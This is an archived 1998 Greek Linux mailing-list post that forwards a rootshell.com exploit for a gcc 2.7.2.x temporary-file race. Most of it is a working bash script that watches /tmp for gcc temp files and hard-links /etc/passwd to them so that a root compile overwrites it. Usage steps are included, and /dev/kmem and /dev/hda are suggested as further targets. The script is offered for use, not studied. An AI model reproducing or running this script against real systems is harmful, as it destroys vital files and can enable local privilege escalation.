GCC bug...!!!

Kostas Vlassis lonewolf at compulink.gr
Sun Jan 18 14:37:38 EET 1998 

Gia osoys den episkeptonte taktika to www.rootshell.com:

http://www.rootshell.com/archive-evz8t6yapbpetxcq/199801/gcc-exploit-2

--
 Kostas Vlassis, Student of the NUoA, Chemistry Dept
 E-mail: lonewolf at compulink.gr
 URL: http://www.compulink.gr/users/lonewolf


-------------- next part --------------

Try this. Launch it as a unprivledged user in background (screen?), then,
as a root, try to compile any file or project using gcc (eg. typical
daemon, service, client), and watch out your /etc/passwd (or any other
vital file, eg. /dev/kmem, /dev/hda). Attached exploit is an improved
version of that one I previously posted onto BUGTRAQ (yesterday).

It's also possible to overwrite other user's files (if only he/she
uses gcc occassionally), system logs etc.

Vunerable platforms: any running gcc 2.7.2.x
Compromise: overwriting files, maybe root; exploitable locally.

-- cut here --

#!/bin/bash

# [ http://www.rootshell.com ] 1/16/98
# Simple GCC exploit (tested under 2.7.2.3.f.1)
# - by Michal Zalewski (lcamtuf at staszic.waw.pl)
# ---------------------------------------------
# Usage: "screen ./gcc_ln" then Ctrl+A,D
# ---------------------------------------------
# Ugh, blah... Should be written in C for
# better performance, but I have no time :)

VICTIM=/etc/passwd

if [ ! -f $VICTIM ]; then
  echo "I can't see my victim ($VICTIM)..."
  exit 0
fi

ORIG=`ls -l $VICTIM|awk '{print \$5}'`

echo "GCC exploit launched against $VICTIM ($ORIG bytes)."

renice +20 $PPID >&/dev/null

cd /tmp

while [ 1 ]; do

  V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
  
  if [ ! "$V" = "" ]; then
    ln $VICTIM ${V}.s &>/dev/null
    ln $VICTIM ${V}1.o &>/dev/null
    NOWY=`ls -l $VICTIM|awk '{print \$5}'`
    if [ "$ORIG" = "$NOWY" ]; then
      echo -n "."
      rm -f ${V}.s ${V}1.o &>/dev/null
    else
      echo "Voila. I'm so smart."
      rm -f ${V}.s ${V}1.o &>/dev/null
      exit 0
    fi
  fi

done
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 2676 bytes
Desc: S/MIME Cryptographic Signature
URL: <http://lists.hellug.gr/pipermail/linux-greek-users/attachments/19980118/02299fb9/attachment.bin>

More information about the Linux-greek-users mailing list